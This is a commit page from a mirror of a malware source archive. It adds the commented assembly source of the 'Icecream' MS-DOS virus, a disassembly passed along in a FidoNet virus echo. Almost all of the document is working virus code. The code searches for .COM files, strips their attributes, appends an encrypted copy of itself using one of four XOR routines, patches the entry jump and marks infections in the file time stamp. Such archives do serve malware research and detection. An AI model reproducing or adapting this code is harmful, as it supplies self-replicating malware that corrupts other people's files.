daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 18:07:35 -06:00
committed by GitHub
parent 6bf46a48b9
commit c227f1121a
97 changed files with 38998 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.vir51.asm
+292
View File
@@ -0,0 +1,292 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 41 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 17:48)
;* To : Ron Toler
;* Subj : ICECREAM.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;Icecream Virus by the TridenT virus research group.
;This is a simple direct-action com virus that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It will infect one .COM file in the current directory every time it is
;executed. It marks infections with the time stamp.
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
db 0e9h,0ch,0 ;jmp Virus_Entry
Author_Name db 'John Tardy'
db 0E2h,0FAh
Virus_Entry:
push ax
call Get_Offset
Get_Offset:
pop ax
sub ax,offset Get_Offset
db 89h,0c5h ;mov bp,ax
lea si,[bp+Storage]
mov di,100h ;Restore file
movsw
movsb
mov ah,1Ah
mov dx,0f900h
int 21h ;Set DTA
mov ah,4Eh
FindFirstNext:
lea dx,[bp+ComMask]
xor cx,cx
int 21h ;Find File
jnc InfectFile
Restore_DTA:
mov ah,1Ah
mov dx,80h
int 21h ;Set DTA to default
mov bx,offset start
pop ax ;Return to host
push bx
retn
InfectFile:
mov ax,4300h
mov dx,0f91eh
int 21h ;Get file attribs
push cx ;save 'em
mov ax,4301h
xor cx,cx
int 21h ;Set them to 0
mov ax,3D02h
int 21h ;Open file
mov bx,5700h
xchg ax,bx
int 21h ;Get file time
push cx
push dx ;save it
and cx,1Fh
cmp cx,1 ;check for infection
jne ContinueInfection
db 0e9h,69h,0 ;jmp DoneInfect
ContinueInfection:
mov ah,3Fh
lea dx,[bp+Storage]
mov cx,3
int 21h ;Read in first 3 bytes
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah ;Is it an EXE?
je DoneInfect
cmp ax,5A4Dh
je DoneInfect ;Other EXE signature?
pop dx
pop cx
and cx,0FFE0h ;Change stored time values
or cx,1 ;to mark infection
push cx
push dx
mov ax,4202h ;Go to the end of the file
call Move_FP
sub ax,3
mov cs:[JumpSize+bp],ax ;Save jump size
add ax,10Fh ;Save encryption starting
mov word ptr [bp+EncPtr1+1],ax ;point....
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption ;Encrypt virus
mov ah,40h
mov dx,0fa00h
mov cx,1F5h
int 21h ;Write virus to file
mov ax,4200h
call Move_FP ;Go to the beginning of file
mov ah,40h
lea dx,[bp+JumpBytes]
mov cx,3
int 21h ;Write in jump
call FinishFile
jmp Restore_DTA
DoneInfect:
call FinishFile
mov ah,4Fh
jmp FindFirstNext
Move_FP:
xor cx,cx
xor dx,dx
int 21h
ret
FinishFile:
pop si dx cx
mov ax,5701h ;Reset file time/date stamp
int 21h ;(or mark infection)
mov ah,3Eh
int 21h ;Close new host file
mov ax,4301h
pop cx
mov dx,0fc1eh
int 21h ;Restore old attributes
push si
retn
Message db ' I scream, you scream, we both '
db 'scream for an ice-cream! '
SetupEncryption:
xor byte ptr [bp+10Dh],2
xor ax,ax
mov es,ax
mov ax,es:[46ch] ;Get random number
push cs
pop es
push ax
and ax,7FFh
add ax,1E9h
mov word ptr [bp+EncSize1+1],ax
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3
shl ax,1
mov si,ax
mov ax,[bp+si+EncData1]
add ax,bp
mov si,ax
lea di,[bp+103h]
movsw
movsw
movsw
movsw ;Copy Encryption Algorithm
pop ax
stosb
movsb
mov dl,al
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch
rep movsb
lea si,[bp+10Fh]
mov cx,1E9h
EncryptVirus:
lodsb
db 30h,0d0h ;xor al,dl
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
KeyWasZero: ;If key is zero, increase
mov si,offset AuthorName ;jump size and place name
mov di,0fa00h ;at beginning....
mov cx,0Ah
rep movsb
mov ax,cs:[JumpSize+bp]
add ax,0Ch
mov cs:[JumpSize+bp],ax
retn
db '[TridenT]'
EncData1 dw 02beh
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
Encryptions:
;------------------------------------------------------------
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h
;------------------------------------------------------------
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
;------------------------------------------------------------
AuthorName db 'John Tardy'
JumpBytes db 0E9h
JumpSize dw 0
ComMask db '*.CoM',0
Storage dw 20CDh
db 21h
end start
;-+- GEcho 1.10+
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/x Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)